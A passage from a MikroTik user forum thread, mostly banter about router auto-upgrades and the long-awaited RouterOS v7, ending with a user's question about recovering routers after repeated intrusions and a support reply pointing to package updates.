Thu Dec 06, 2018 12:59 pm

Noobs will scream when their router randomly restart (because it was just applying updates during their gameplay)
Tools -> Traffic Monitor :) "If there's no traffic for the last 5 minutes - it's okay to upgrade" xD
= never :D
But they will stop complaining about the feature missing! xD
How cute. We all know that there is only one way for this to be done correctly.

Implement telepathic sensing software in all routers. When there is a new upgrade available, check if all residents are asleep. If all residents are asleep, check if any of them are dreaming of possible ongoing downloads or important services that need to stay online.
If telepathic sensing detect nothing of concern, initiate internal reality simulation to predict the future. What would the future be like if the router upgraded right now? If customer would complain about the interruption, don't upgrade. What would the future be like if the router DID NOT upgrade right now? If customer would complain about the lack of auto-upgrade, upgrade the router. If the customer would complain either way, then toture the simulated customer for a billion years and brick the router.
Last edited by Deantwo on Thu Dec 06, 2018 1:02 pm, edited 2 times in total.
I wish my FTP was FTL.
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 24186
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: URGENT security reminder

Thu Dec 06, 2018 1:00 pm

We are working on that for v7
No answer to your question? How to write posts
 
mkx
Forum Guru
Forum Guru
Posts: 2910
Joined: Thu Mar 03, 2016 10:23 pm

Re: URGENT security reminder

Thu Dec 06, 2018 1:03 pm

We are working on that for v7
I'd say that this is already done in v7 alpha as it's the easy part. I bet that showstopper is implementation of letsencrypt certificate autoupdate.
BR,
Metod
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 24186
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: URGENT security reminder

Thu Dec 06, 2018 1:06 pm

I was talking about mind reading and future prediction, but ok
No answer to your question? How to write posts
 
mkx
Forum Guru
Forum Guru
Posts: 2910
Joined: Thu Mar 03, 2016 10:23 pm

Re: URGENT security reminder

Thu Dec 06, 2018 1:12 pm

Me too.
BR,
Metod
 
User avatar
mozerd
Member Candidate
Member Candidate
Posts: 258
Joined: Thu Oct 05, 2017 3:39 pm
Location: Canada
Contact:

Re: URGENT security reminder

Thu Dec 06, 2018 3:17 pm

We are working on that for v7
This appeared on my radar screen THIS AM with the moniker of UFO ... NORAD sent 3 F18 jets to try and intercept but failed to catch the phantom OS.
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 24186
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: URGENT security reminder

Thu Dec 06, 2018 3:23 pm

blip
Screenshot 2018-12-06 at 15.22.50.png
You do not have the required permissions to view the files attached to this post.
No answer to your question? How to write posts
 
cdemers
Member Candidate
Member Candidate
Posts: 184
Joined: Sun Feb 26, 2006 3:32 pm
Location: Canada
Contact:

Re: URGENT security reminder

Thu Dec 06, 2018 3:37 pm

Teasing us :) wish we could have an alpha/beta for Christmas to play with

Sent from my SM-A520W using Tapatalk

 
Kindis
Member Candidate
Member Candidate
Posts: 247
Joined: Tue Nov 01, 2011 6:54 pm

Re: URGENT security reminder

Thu Dec 06, 2018 3:40 pm

This sums up how I think ROS 7 is communicated! :-)
Image
Last edited by Kindis on Thu Dec 06, 2018 3:42 pm, edited 1 time in total.
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 24186
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: URGENT security reminder

Thu Dec 06, 2018 3:42 pm

No, major misunderstanding :D

Not "it will be fixed in v7", but "It can only be fixed in v7".
No answer to your question? How to write posts
 
Kindis
Member Candidate
Member Candidate
Posts: 247
Joined: Tue Nov 01, 2011 6:54 pm

Re: URGENT security reminder

Thu Dec 06, 2018 3:45 pm

No, major misunderstanding :D

Not "it will be fixed in v7", but "It can only be fixed in v7".
So sorry but I could not just contain myself ;-) Not that I'm missing V7 I just follow the forum :-)
 
User avatar
Jotne
Forum Guru
Forum Guru
Posts: 1302
Joined: Sat Dec 24, 2016 11:17 am
Location: jo.overland at gmail.com

Re: URGENT security reminder

Thu Dec 06, 2018 4:44 pm

This was posted february 2015 by normis
We will release a beta, when it will exist. Currently v7 is in alpha stage, many functions are not completed and non functional. Beta needs at least all functions to be somewhat operational.
viewtopic.php?t=93106#p467540

V7 are not at alpha167

So V7beta1 should be the next after alpha 999
An v7 Release-candidate men be out after beta 999
:mrgreen:


Looking for the beta to be announced:
Alpha means "internal testing".
When we will have "public testing" (meaning Beta), we will announce it here.
 
How to use Splunk to monitor your MikroTik Router

MikroTik->Splunk
 
 
User avatar
Chupaka
Forum Guru
Forum Guru
Posts: 8308
Joined: Mon Jun 19, 2006 11:15 pm
Location: Minsk, Belarus
Contact:

Re: URGENT security reminder

Thu Dec 06, 2018 5:32 pm

Normis, is it public FTP? Is it in ipv4 address space? xD
Russian-speaking forum: https://forum.mikrotik.by/. Welcome!

For every complex problem, there is a solution that is simple, neat, and wrong.

MikroTik. Your life. Your routing.
 
mkx
Forum Guru
Forum Guru
Posts: 2910
Joined: Thu Mar 03, 2016 10:23 pm

Re: URGENT security reminder

Thu Dec 06, 2018 6:13 pm

Is it in ipv4 address space?
Sure it is: 127.0.0.1 :-P
BR,
Metod
 
User avatar
Jotne
Forum Guru
Forum Guru
Posts: 1302
Joined: Sat Dec 24, 2016 11:17 am
Location: jo.overland at gmail.com

Re: URGENT security reminder

Thu Dec 06, 2018 8:03 pm

I like this site better
ftp://[::1]
 
How to use Splunk to monitor your MikroTik Router

MikroTik->Splunk
 
 
mistry7
Forum Guru
Forum Guru
Posts: 1314
Joined: Tue Oct 13, 2009 11:57 am
Location: Germany

Re: URGENT security reminder

Thu Dec 06, 2018 11:08 pm

 
digitec
just joined
Posts: 18
Joined: Wed Jan 31, 2018 3:13 pm

Re: URGENT security reminder

Mon Dec 17, 2018 5:55 pm

Not highly likely, but technically possible, although have not seen an example "in the wild". There are published methods how to do that, but from what you posted, those are the "regular" hacks.

Netinstall is always the safest choice, but 90% chance that deleting all this stuff + upgrade + new password will resolve your current issue.
Hi, I have regular unwanted visitors on my IP and it come so far that now I can not use Netinstall , Routerboards RB962 and many others saying after "visit" factory boot loader 3.41, current boot loader 3.41 , upgrade boot loader 3.41. If Netinsatll can not be used than how to format NAND disk?
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 24186
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: URGENT security reminder

Tue Dec 18, 2018 9:12 am

Not highly likely, but technically possible, although have not seen an example "in the wild". There are published methods how to do that, but from what you posted, those are the "regular" hacks.

Netinstall is always the safest choice, but 90% chance that deleting all this stuff + upgrade + new password will resolve your current issue.
Hi, I have regular unwanted visitors on my IP and it come so far that now I can not use Netinstall , Routerboards RB962 and many others saying after "visit" factory boot loader 3.41, current boot loader 3.41 , upgrade boot loader 3.41. If Netinsatll can not be used than how to format NAND disk?
RouterBOOT has nothing to do with the issue.
Check "Sytem -> Packages" menu, there is a button, check for updates.
No answer to your question? How to write posts

Who is online

Users browsing this forum: No registered users and 7 guests